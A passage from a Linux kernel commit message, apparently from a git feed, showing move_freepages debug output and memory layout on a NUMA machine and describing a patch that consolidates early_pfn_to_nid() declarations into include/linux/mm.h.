		       page_to_pfn(start_page), page_to_pfn(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_nid[%d] end_nid[%d]\n",
		       page_to_nid(start_page), page_to_nid(end_page));
 ...

And here's what I got:

	move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00]
	move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00]
	move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff]
	move_freepages: start_nid[1] end_nid[0]

My memory layout on this box is:

[    0.000000] Zone PFN ranges:
[    0.000000]   Normal   0x00000000 -&gt; 0x0081ff5d
[    0.000000] Movable zone start PFN for each node
[    0.000000] early_node_map[8] active PFN ranges
[    0.000000]     0: 0x00000000 -&gt; 0x00020000
[    0.000000]     1: 0x00800000 -&gt; 0x0081f7ff
[    0.000000]     1: 0x0081f800 -&gt; 0x0081fe50
[    0.000000]     1: 0x0081fed1 -&gt; 0x0081fed8
[    0.000000]     1: 0x0081feda -&gt; 0x0081fedb
[    0.000000]     1: 0x0081fedd -&gt; 0x0081fee5
[    0.000000]     1: 0x0081fee7 -&gt; 0x0081ff51
[    0.000000]     1: 0x0081ff59 -&gt; 0x0081ff5d

So it's a block move in that 0x81f600--&gt;0x81f7ff region which triggers
the problem.

This patch:

Declaration of early_pfn_to_nid() is scattered over per-arch include
files, and it seems it's complicated to know when the declaration is used.
 I think it makes fix-for-memmap-init not easy.

This patch moves all declaration to include/linux/mm.h

After this,
  if !CONFIG_NODES_POPULATES_NODE_MAP &amp;&amp; !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -&gt; Use static definition in include/linux/mm.h
  else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -&gt; Use generic definition in mm/page_alloc.c
  else
     -&gt; per-arch back end function will be called.

Signed-off-by: KAMEZAWA Hiroyuki &lt;kamezawa.hiroyu@jp.fujitsu.com&gt;
Tested-by: KOSAKI Motohiro &lt;kosaki.motohiro@jp.fujitsu.com&gt;
Reported-by: David Miller &lt;davem@davemlloft.net&gt;
Cc: Mel Gorman &lt;mel@csn.ul.ie&gt;
Cc: Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt;
Signed-off-by: Andrew Morton &lt;akpm@linux-foundation.org&gt;
Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt;
Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt;

</pre>
</div>
</content>
</entry>
</feed>
